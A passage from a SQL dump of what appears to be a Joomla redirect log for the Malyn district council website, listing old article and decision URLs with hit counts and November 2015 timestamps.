00:00:00',301),(18091,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=822:----------2012--2013-----------------l-r&catid=45:--14112012-&Itemid=84&lang=ru','','','',32,0,'2015-11-11 16:50:00','0000-00-00 00:00:00',301),(18092,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=822:----------2012--2013-----------------l-r&catid=45:--14112012-&Itemid=84&lang=uk','','','',7,0,'2015-11-11 16:50:01','0000-00-00 00:00:00',301),(18093,'http://www.malyn-rayrada.org.ua/index.php/516-zaversheno-pidgotovku-do-provedennja-20-sesii?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-11 16:50:23','0000-00-00 00:00:00',301),(18094,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=552:2012-01-26-12-47-12&catid=39&Itemid=76&lang=ru','','','',1,0,'2015-11-11 16:50:23','0000-00-00 00:00:00',301),(18095,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=703:-2012-&catid=43&Itemid=82&lang=uk','','','',15,0,'2015-11-11 16:50:24','0000-00-00 00:00:00',301),(18096,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=707:-231-280312-l-2012-r&catid=43&Itemid=82&lang=uk','','','',1,0,'2015-11-11 16:50:25','0000-00-00 00:00:00',301),(18097,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=546:-l-r-&catid=39&Itemid=76&lang=uk','','','',5,0,'2015-11-11 16:50:25','0000-00-00 00:00:00',301),(18098,'http://www.malyn-rayrada.org.ua/index.php/523-vidbulas-21-pozachergova-sesija-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-11-11 16:50:25','0000-00-00 00:00:00',301),(18099,'http://www.malyn-rayrada.org.ua/index.php/552-u-fedorivci-rozpochali-robotu-po-navedennju?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-11 16:50:27','0000-00-00 00:00:00',301),(18100,'http://www.malyn-rayrada.org.ua/index.php/562-upravlinnja-statistiki-informue','','','',13,0,'2015-11-11 16:50:28','0000-00-00 00:00:00',301),(18101,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=733:-10-&catid=11&Itemid=14&lang=uk','','','',3,0,'2015-11-11 16:50:31','0000-00-00 00:00:00',301),(18102,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=359:2011-06-30-11-10-42&catid=35:2011-06-30-10-56-57&Itemid=69&lang=ru','','','',1,0,'2015-11-11 16:50:33','0000-00-00 00:00:00',301),(18103,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=353:2011-06-22-11-48-36&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2015-11-11 16:50:33','0000-00-00 00:00:00',301),(18104,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/504-pro-pogodzhennja-statusu-malinskoi-ditjachoi','','','',50,0,'2015-11-11 16:50:59','0000-00-00 00:00:00',301),(18105,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/679-pro-zatverdzhennja-porjadku-i-normativiv_4','','','',18,0,'2015-11-11 16:51:01','0000-00-00 00:00:00',301),(18106,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/58-rishennja-radi/rishennja/--19122011-?lang=ru&start=28','','','',3,0,'2015-11-11 16:51:01','0000-00-00 00:00:00',301),(18107,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=879:2012-12-21-17-02-01&catid=46:--21122012&Itemid=85&lang=ru','','','',1,0,'2015-11-11 16:51:25','0000-00-00 00:00:00',301),(18108,'http://www.malyn-rayrada.org.ua/index.php/1136-pishov-z-zhittya-mikola-demskij','','','',18,0,'2015-11-11 16:51:28','0000-00-00 00:00:00',301),(18109,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/58-rishennja-radi/rishennja/--19122011-?lang=en&start=28','','','',3,0,'2015-11-11 16:51:29','0000-00-00 00:00:00',301),(18110,'http://www.malyn-rayrada.org.ua/index.php/1179-vitannya-sub-ektiv-pidpriemnitskoji-diyalnosti-rajonu-iz-profesijnim-svyatom','','','',21,0,'2015-11-11 16:51:31','0000-00-00 00:00:00',301),(18111,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/58-rishennja-radi/rishennja/--19122011-?lang=uk&start=35','','','',3,0,'2015-11-11 16:51:31','0000-00-00 00:00:00',301),(18112,'http://www.malyn-rayrada.org.ua/index.php/591-shanovni-pidpriemci','','','',36,0,'2015-11-11 16:51:34','0000-00-00 00:00:00',301),(18113,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=33&Itemid=66&lang=uk','','','',14,0,'2015-11-11 16:52:04','0000-00-00 00:00:00',301),(18114,'http://www.malyn-rayrada.org.ua/index.php/622-malinske-viddilennja-dai-udai-umvs-ukraini-v','','','',16,0,'2015-11-11 16:52:05','0000-00-00 00:00:00',301),(18115,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=35&Itemid=69&lang=uk','','','',10,0,'2015-11-11 16:52:08','0000-00-00 00:00:00',301),(18116,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=38&Itemid=73&lang=en&limitstart=35','','','',1,0,'2015-11-11 16:52:25','0000-00-00 00:00:00',301),(18117,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=45&Itemid=84&lang=en&limitstart=25','','','',1,0,'2015-11-11 16:52:26','0000-00-00 00:00:00',301),(18118,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=565:2012-02-03-09-48-29&Itemid=76&lang=ru','','','',1,0,'2015-11-11 16:52:31','0000-00-00 00:00:00',301),(18119,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=583:-l-lr&catid=40&Itemid=77&lang=ru','','','',13,0,'2015-11-11 16:52:33','0000-00-00 00:00:00',301),(18120,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=54&Itemid=95&lang=uk','','','',5,0,'2015-11-11 16:52:34','0000-00-00 00:00:00',301),(18121,'http://www.malyn-rayrada.org.ua/index.php/718-vidbulas-pozachergova-sesija-malinskoi-rajonnoi','','','',39,0,'2015-11-11 16:52:35','0000-00-00 00:00:00',301),(18122,'http://www.malyn-rayrada.org.ua/index.php/591-shanovni-pidpriemci?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-11 16:52:57','0000-00-00 00:00:00',301),(18123,'http://www.malyn-rayrada.org.ua/index.php/603-ogoloshennja-akcija-miloserdja','','','',16,0,'2015-11-11 16:52:58','0000-00-00 00:00:00',301),(18124,'http://www.malyn-rayrada.org.ua/index.php/613-upravlinnja-statistiki-informue_2','','','',19,0,'2015-11-11 16:53:02','0000-00-00 00:00:00',301),(18125,'http://www.malyn-rayrada.org.ua/index.php/1218-16-zhovtnya-2015-roku-vidbudetsya-spilnij-seminar-navchannya-dlya-platnikiv-podatkiv','','','',21,0,'2015-11-11 16:53:06','0000-00-00 00:00:00',301),(18126,'http://www.malyn-rayrada.org.ua/index.php/728-ogoloshennja_13','','','',57,0,'2015-11-11 16:53:23','0000-00-00 00:00:00',301),(18127,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/34-pro-plan-roboti-rajonnoi-radi-na-ii-pivrichchja','','','',13,0,'2015-11-11 16:53:24','0000-00-00 00:00:00',301),(18128,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1154-vladivska-silska-rada-informue?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-11 16:53:27','0000-00-00 00:00:00',301),(18129,'http://www.malyn-rayrada.org.ua/index.php/1000-go-malinshchina-pidtrimaemo-zemlyakiv-dopomozhimo-jim-razom','','','',10,0,'2015-11-11 16:53:30','0000-00-00 00:00:00',301),(18130,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/330-pro-vnesennja-zmin-do-rajonnoi-programi_2','','','',29,0,'2015-11-11 16:53:31','0000-00-00 00:00:00',301),(18131,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=736:2012-07-18-13-34-35&catid=43:--25072012-&Itemid=82&lang=ru','','','',1,0,'2015-11-11 16:53:53','0000-00-00 00:00:00',301),(18132,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=20:-2009-&catid=16:2010-06-06-10-55-25&Itemid=39&lang=uk','','','',8,0,'2015-11-11 16:53:56','0000-00-00 00:00:00',301),(18133,'http://www.malyn-rayrada.org.ua/index.php/580-upravlinnja-statistiki-v-m-malin-informue_2','','','',21,0,'2015-11-11 16:53:57','0000-00-00 00:00:00',301),(18134,'http://www.malyn-rayrada.org.ua/index.php/584-vidbulas-23-pozachergova-sesija-malinskoi-rajonnoi','','','',23,0,'2015-11-11 16:54:00','0000-00-00 00:00:00',301),(18135,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=818:2012-11-14-16-37-52&catid=45:--14112012-&Itemid=84&lang=ru','','','',1,0,'2015-11-11 16:54:00','0000-00-00 00:00:00',301),(18136,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=819:2012-11-14-16-40-09&catid=45:--14112012-&Itemid=84&lang=ru','','','',1,0,'2015-11-11 16:54:03','0000-00-00 00:00:00',301),(18137,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=820:2012-11-14-16-42-11&catid=45:--14112012-&Itemid=84&lang=ru','','','',38,0,'2015-11-11 16:54:03','0000-00-00 00:00:00',301),(18138,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=821:------12--2012--311-l------------r&catid=45:--14112012-&Itemid=84&lang=ru','','','',2,0,'2015-11-11 16:54:03','0000-00-00 00:00:00',301),(18139,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=39&Itemid=76&lang=en&limitstart=15','','','',1,0,'2015-11-11 16:54:28','0000-00-00 00:00:00',301),(18140,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=41&Itemid=78&lang=uk','','','',12,0,'2015-11-11 16:54:29','0000-00-00 00:00:00',301),(18141,'http://www.malyn-rayrada.org.ua/index.php/686-zustrichaemo-novij-2014-rik-rik-sinogo-derev','','','',21,0,'2015-11-11 16:54:32','0000-00-00 00:00:00',301),(18142,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=47&Itemid=86&lang=en&limitstart=15','','','',1,0,'2015-11-11 16:54:32','0000-00-00 00:00:00',301),(18143,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=51&Itemid=92&lang=uk&limitstart=20','','','',1,0,'2015-11-11 16:54:35','0000-00-00 00:00:00',301),(18144,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=583:-l-lr&catid=40:--28032012-&Itemid=77&lang=ru','','','',7,0,'2015-11-11 16:54:35','0000-00-00 00:00:00',301),(18145,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=583:-l-lr&catid=40&Itemid=77&lang=uk','','','',9,0,'2015-11-11 16:54:35','0000-00-00 00:00:00',301),(18146,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=591:2012-02-27-14-31-33&catid=40&Itemid=77&lang=ru','','','',9,0,'2015-11-11 16:54:35','0000-00-00 00:00:00',301),(18147,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=594:-lr-&catid=40:--28032012-&Itemid=77&lang=ru','','','',2,0,'2015-11-11 16:54:36','0000-00-00 00:00:00',301),(18148,'http://www.malyn-rayrada.org.ua/index.php/244-ekzotiki-za-rahunok-bjudzhetu-ne-bude','','','',47,0,'2015-11-11 16:54:54','0000-00-00 00:00:00',301),(18149,'http://www.malyn-rayrada.org.ua/index.php/264-6-ljutogo-2012-roku-vipadkove-foto','','','',31,0,'2015-11-11 16:54:55','0000-00-00 00:00:00',301),(18150,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30042014-/783-pro-programu-socialno-ekonomichnogo-rozvitku_4','','','',30,0,'2015-11-11 16:54:55','0000-00-00 00:00:00',301),(18151,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/13-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi','','','',14,0,'2015-11-11 16:54:56','0000-00-00 00:00:00',301),(18152,'http://www.malyn-rayrada.org.ua/index.php/470-pro-vidznachennja-derzhavnimi-nagorodami-ukraini-z','','','',23,0,'2015-11-11 16:54:58','0000-00-00 00:00:00',301),(18153,'http://www.malyn-rayrada.org.ua/index.php/475-vidbulas-pozachergova-19-sesija-rajonnoi-radi','','','',11,0,'2015-11-11 16:54:58','0000-00-00 00:00:00',301),(18154,'http://www.malyn-rayrada.org.ua/index.php/477-priznachennja-tizhnja_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-11 16:55:00','0000-00-00 00:00:00',301),(18155,'http://www.malyn-rayrada.org.ua/index.php/1034-vitaemo-iz-svyatom-vesni','','','',27,0,'2015-11-11 16:55:01','0000-00-00 00:00:00',301),(18156,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=610:2012-03-23-06-34-31&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2015-11-11 16:55:01','0000-00-00 00:00:00',301),(18157,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=647:2012-04-09-08-35-02&catid=42&Itemid=80&lang=uk','','','',8,0,'2015-11-11 16:55:01','0000-00-00 00:00:00',301),(18158,'http://www.malyn-rayrada.org.ua/index.php/1137-zustrich-iz-predstavnikami-teritorialnikh-gromad','','','',20,0,'2015-11-11 16:55:23','0000-00-00 00:00:00',301),(18159,'http://www.malyn-rayrada.org.ua/index.php/933-vidbulas-35-sesiya-rajonnoji-radi','','','',49,0,'2015-11-11 16:55:29','0000-00-00 00:00:00',301),(18160,'http://www.malyn-rayrada.org.ua/index.php/724-verhovna-rada-ukraini-prijnjala-postanovu-pro','','','',18,0,'2015-11-11 16:55:52','0000-00-00 00:00:00',301),(18161,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/531-pro-prisvoennja-zvannja-pochesnogo-gromadjanina_3','','','',13,0,'2015-11-11 16:55:54','0000-00-00 00:00:00',301),(18162,'http://www.malyn-rayrada.org.ua/index.php/759-ogoloshennja_14','','','',22,0,'2015-11-11 16:55:54','0000-00-00 00:00:00',301),(18163,'http://www.malyn-rayrada.org.ua/index.php/244-ekzotiki-za-rahunok-bjudzhetu-ne-bude?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-11 16:55:59','0000-00-00 00:00:00',301),(18164,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=735:2012-07-18-13-32-43&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',1,0,'2015-11-11 16:56:23','0000-00-00 00:00:00',301),(18165,'http://www.malyn-rayrada.org.ua/index.php/616-narodnij-deputat-ukraini-zhuravskij-trimae-slovo','','','',10,0,'2015-11-11 16:56:25','0000-00-00 00:00:00',301),(18166,'http://www.malyn-rayrada.org.ua/index.php/617-shkoli-buti','','','',20,0,'2015-11-11 16:56:27','0000-00-00 00:00:00',301),(18167,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=40&Itemid=77&lang=uk','','','',11,0,'2015-11-11 16:56:31','0000-00-00 00:00:00',301),(18168,'http://www.malyn-rayrada.org.ua/index.php/310-zakinchilis-poshuki-v-rodini-volovenko-mogili?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-11 16:56:49','0000-00-00 00:00:00',301),(18169,'http://www.malyn-rayrada.org.ua/index.php/40-vitaemo-zi-svjatom-hristovogo-voskresinnja','','','',8,0,'2015-11-11 16:56:51','0000-00-00 00:00:00',301),(18170,'http://www.malyn-rayrada.org.ua/index.php/401-predstavleno-kerivnika-kp-malinska-rajonna','','','',24,0,'2015-11-11 16:56:52','0000-00-00 00:00:00',301),(18171,'http://www.malyn-rayrada.org.ua/index.php/408-ogoloshennja_2','','','',40,0,'2015-11-11 16:56:52','0000-00-00 00:00:00',301),(18172,'http://www.malyn-rayrada.org.ua/index.php/1014-20-lyutogo-2015-roku-blagodijnij-kontsert-povertajsya-zhivim','','','',18,0,'2015-11-11 16:56:53','0000-00-00 00:00:00',301),(18173,'http://www.malyn-rayrada.org.ua/index.php/454-vitaemo','','','',25,0,'2015-11-11 16:56:55','0000-00-00 00:00:00',301),(18174,'http://www.malyn-rayrada.org.ua/index.php/464-malinskij-ditjachij-shkoli-mistectv-50?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-11-11 16:56:56','0000-00-00 00:00:00',301),(18175,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=6:2010-06-05-14-26-47&catid=6:2010-06-05-12-52-17&Itemid=9&lang=uk','','','',1,0,'2015-11-11 16:56:57','0000-00-00 00:00:00',301),(18176,'http://www.malyn-rayrada.org.ua/index.php/483-zaversheno-pidgotovku-do-17-sesii-malinskoi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-11 16:56:58','0000-00-00 00:00:00',301),(18177,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=634:-2016-&catid=42&Itemid=80&lang=uk','','','',2,0,'2015-11-11 16:56:58','0000-00-00 00:00:00',301),(18178,'http://www.malyn-rayrada.org.ua/index.php/664-ogoloshennja_11','','','',21,0,'2015-11-11 16:57:15','0000-00-00 00:00:00',301),(18179,'http://www.malyn-rayrada.org.ua/index.php/71-novo-vorob’ivskij-znvkshkola-sad-i-iii-stupeniv','','','',3,0,'2015-11-11 16:57:16','0000-00-00 00:00:00',301),(18180,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1147-lyubovitska-silska-rada-informue?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-11 16:57:16','0000-00-00 00:00:00',301),(18181,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=594:-lr-&catid=40&Itemid=77&lang=uk','','','',1,0,'2015-11-11 16:57:21','0000-00-00 00:00:00',301),(18182,'http://www.malyn-rayrada.org.ua/index.php/719-vidminnosti-norm-konstitucij-u-redakcii-1996-i','','','',16,0,'2015-11-11 16:57:23','0000-00-00 00:00:00',301),(18183,'http://www.malyn-rayrada.org.ua/index.php/721-verhovna-rada-zatverdila-sklad-kabinetu-ministriv','','','',12,0,'2015-11-11 16:57:24','0000-00-00 00:00:00',301),(18184,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/544-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2013_2','','','',18,0,'2015-11-11 16:57:52','0000-00-00 00:00:00',301),(18185,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1155-josipivska-silska-rada-informue?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-11 16:57:55','0000-00-00 00:00:00',301),(18186,'http://www.malyn-rayrada.org.ua/index.php/310-zakinchilis-poshuki-v-rodini-volovenko-mogili','','','',16,0,'2015-11-11 16:57:57','0000-00-00 00:00:00',301),(18187,'http://www.malyn-rayrada.org.ua/index.php/32-zasluzhene-zvannja-direktorovi-malinskoi-djussh','','','',20,0,'2015-11-11 16:57:58','0000-00-00 00:00:00',301),(18188,'http://www.malyn-rayrada.org.ua/index.php/464-malinskij-ditjachij-shkoli-mistectv-50','','','',18,0,'2015-11-11 16:58:21','0000-00-00 00:00:00',301),(18189,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/68-rishennya-vid-25-09-2014-roku','','','',16,0,'2015-11-11 16:58:22','0000-00-00 00:00:00',301),(18190,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku/935-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-po-viznachennyu-normativnoji-groshovoji-otsinki-zemelnikh-dilyanok-shcho-p','','','',1,0,'2015-11-11 16:58:24','0000-00-00 00:00:00',301),(18191,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=6:2010-06-05-14-26-47&catid=6:2010-06-05-12-52-17&Itemid=9&lang=ru','','','',5,0,'2015-11-11 16:58:26','0000-00-00 00:00:00',301),(18192,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/231-pro-ne-zaperechennja-shhodo-nadannja-v','','','',10,0,'2015-11-11 17:00:10','0000-00-00 00:00:00',301),(18193,'http://www.malyn-rayrada.org.ua/index.php/649-pro-ogoloshennja-podjaki','','','',19,0,'2015-11-11 17:31:35','0000-00-00 00:00:00',301),(18194,'http://www.malyn-rayrada.org.ua/index.php/549-za-materialami-zvernen-rajonnoi-radi_4','','','',15,0,'2015-11-11 17:33:11','0000-00-00 00:00:00',301),(18195,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=728:2012-06-26-07-51-10&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',1,0,'2015-11-11 17:33:11','0000-00-00 00:00:00',301),(18196,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=544:2012-01-26-12-03-44&catid=39:-22022012-&Itemid=76&lang=uk','','','',2,0,'2015-11-11 17:33:11','0000-00-00 00:00:00',301),(18197,'http://www.malyn-rayrada.org.ua/index.php/1112-vikonannya-dokhidnoji-chastini-byudzhetiv-rajoniv-ta-mist-oblasti-za-5-misyatsiv-2015-roku','','','',20,0,'2015-11-11 18:06:10','0000-00-00 00:00:00',301),(18198,'http://www.malyn-rayrada.org.ua/index.php/525-rejtingova-ocinka-dijalnosti-rajoniv-ta-mist','','','',5,0,'2015-11-11 18:29:22','0000-00-00 00:00:00',301),(18199,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=613:2012-03-26-14-13-34&lang=uk&option=com_content&view=article','','','',2,0,'2015-11-11 18:49:58','0000-00-00 00:00:00',301),(18200,'http://www.malyn-rayrada.org.ua/index.php/705-korotko-pro-finansi','','','',10,0,'2015-11-11 19:02:44','0000-00-00 00:00:00',301),(18201,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=554:-l-r&catid=39&Itemid=76&lang=uk','','','',4,0,'2015-11-11 19:06:18','0000-00-00 00:00:00',301),(18202,'http://www.malyn-rayrada.org.ua/index.php/589-pogodzhennja-na-remont-navchalnogo-zakladu-v-smt','','','',26,0,'2015-11-11 19:31:31','0000-00-00 00:00:00',301),(18203,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43&id=720:-l-r&lang=uk&option=com_content&view=article','','','',5,0,'2015-11-11 19:38:22','0000-00-00 00:00:00',301),(18204,'http://www.malyn-rayrada.org.ua/index.php/884-vidbulas-koordinatsijna-rada-pri-golovi-malinskoji-rajonnoji-radi','','','',26,0,'2015-11-11 19:44:56','0000-00-00 00:00:00',301),(18205,'http://www.malyn-rayrada.org.ua/index.php/559-i-u-ditej-ih-batkiv-ta-vchiteliv-bude-svjato','','','',20,0,'2015-11-11 19:49:00','0000-00-00 00:00:00',301),(18206,'http://www.malyn-rayrada.org.ua/index.php/614-osvoennja-novoi-profesii-abo-pidvishhennja','','','',22,0,'2015-11-11 20:06:32','0000-00-00 00:00:00',301),(18207,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&id=47:-21022013-&lang=uk&layout=blog&limitstart=5&option=com_content&view=category','','','',4,0,'2015-11-11 20:23:15','0000-00-00 00:00:00',301),(18208,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=784:-9-&lang=uk&option=com_content&view=article','','','',2,0,'2015-11-11 20:23:16','0000-00-00 00:00:00',301),(18209,'http://www.malyn-rayrada.org.ua/index.php/1181-pro-sklikannya-42-sesiji-rajonnoji-radi-6-sklikannya','','','',21,0,'2015-11-11 20:23:22','0000-00-00 00:00:00',301),(18210,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=251:-2010-2011-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2015-11-11 20:36:46','0000-00-00 00:00:00',301),(18211,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&catid=39&id=561:2012-02-02-08-58-39&lang=uk&option=com_content&view=article','','','',3,0,'2015-11-11 21:59:38','0000-00-00 00:00:00',301),(18212,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&id=38:--19122011-&lang=uk&layout=blog&option=com_content&view=category','','','',2,0,'2015-11-11 21:59:39','0000-00-00 00:00:00',301),(18213,'http://www.malyn-rayrada.org.ua/index.php/56-ogoloshennja-shhodo-provedennja-kruglogo-stolu','','','',28,0,'2015-11-11 22:10:48','0000-00-00 00:00:00',301),(18214,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=218:2010-12-21-06-45-54&lang=uk&option=com_content&view=article','','http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11%3A2010-06-05-14-33-33&id=218%3A2010-12-21-06-45-54&lang=uk&option=com_content&view=articl','',3,0,'2015-11-11 22:20:24','0000-00-00 00:00:00',301),(18216,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=39&Itemid=76&lang=uk&limitstart=15','','','',7,0,'2015-11-11 22:45:34','0000-00-00 00:00:00',301),(18217,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=45&Itemid=84&lang=ru&limitstart=5','','','',6,0,'2015-11-11 22:45:59','0000-00-00 00:00:00',301),(18218,'http://www.malyn-rayrada.org.ua/index.php/309-vitaemo-z-dnem-peremogi_2','','','',43,0,'2015-11-11 22:49:37','0000-00-00 00:00:00',301),(18219,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=613:2012-03-26-14-13-34&catid=11&lang=ru&Itemid=','','','',4,0,'2015-11-11 22:51:45','0000-00-00 00:00:00',301),(18220,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=265:2011-03-18-06-34-25&catid=11&Itemid=14&lang=uk','','','',5,0,'2015-11-11 22:52:05','0000-00-00 00:00:00',301),(18221,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=20:-2009-&catid=16&Itemid=39&lang=en','','','',7,0,'2015-11-11 22:57:31','0000-00-00 00:00:00',301),(18222,'http://www.malyn-rayrada.org.ua/attachments/article/1122/Малегус.pdf','','','',3,0,'2015-11-11 22:58:31','0000-00-00 00:00:00',301),(18223,'http://www.malyn-rayrada.org.ua/index.php/308-u-2011-roci-kiiv-donecka-ta-luganska-oblasti','','','',73,0,'2015-11-11 22:59:53','0000-00-00 00:00:00',301),(18224,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--11032013-','','','',27,0,'2015-11-11 23:10:29','0000-00-00 00:00:00',301),(18225,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1208-pro-vnesennya-zmin-do-polozhennya-pro-postijni-komisiji-rajonnoji-radi','','','',20,0,'2015-11-11 23:11:25','0000-00-00 00:00:00',301),(18226,'http://www.malyn-rayrada.org.ua/index.php/575-vidbulas-22-sesija-malinskoi-rajonnoi-radi','','','',29,0,'2015-11-11 23:24:58','0000-00-00 00:00:00',301),(18227,'http://www.malyn-rayrada.org.ua/index.php/565-vikonannja-dohidnoi-chastini-miscevih-bjudzhetiv','','','',30,0,'2015-11-11 23:25:18','0000-00-00 00:00:00',301),(18228,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=733:-10-&lang=ru&option=com_content&view=article','','','',4,0,'2015-11-11 23:32:33','0000-00-00 00:00:00',301),(18229,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=523:2011-12-30-10-16-28&catid=38:--19122011-&Itemid=73&lang=ru','','','',4,0,'2015-11-11 23:36:44','0000-00-00 00:00:00',301),(18230,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=503:-2017-&catid=38:--19122011-&Itemid=73&lang=ru','','','',5,0,'2015-11-12 00:26:10','0000-00-00 00:00:00',301),(18232,'http://www.malyn-rayrada.org.ua/index.php/20-vidbulos-zasidannja-koordinacijnoi-radi-z-pitan','','','',16,0,'2015-11-12 01:06:20','0000-00-00 00:00:00',301),(18233,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&catid=39&id=560:2012-02-02-08-56-53&lang=ru&option=com_content&view=article','','','',3,0,'2015-11-12 01:10:05','0000-00-00 00:00:00',301),(18234,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=483:-2012-2016-&catid=38&Itemid=73&lang=ru','','','',7,0,'2015-11-12 01:39:33','0000-00-00 00:00:00',301),(18235,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-?start=20','','','',3,0,'2015-11-12 01:43:57','0000-00-00 00:00:00',301),(18236,'http://www.malyn-rayrada.org.ua/index.php/1092-ogoloshennya-malinskoji-rajonnoji-blagodijnoji-organizatsiji-zakhist-ditej-chornobilya-shchodo-vidpochinku','','','',20,0,'2015-11-12 01:49:02','0000-00-00 00:00:00',301),(18237,'http://malyn-rayrada.org.ua/index.php/1152-na-poryadku-dennomu-virishennya-problem-silskikh-gromad','','','',8,0,'2015-11-12 02:01:40','0000-00-00 00:00:00',301),(18238,'http://malyn-rayrada.org.ua/index.php/1186-q','','','',12,0,'2015-11-12 02:01:43','0000-00-00 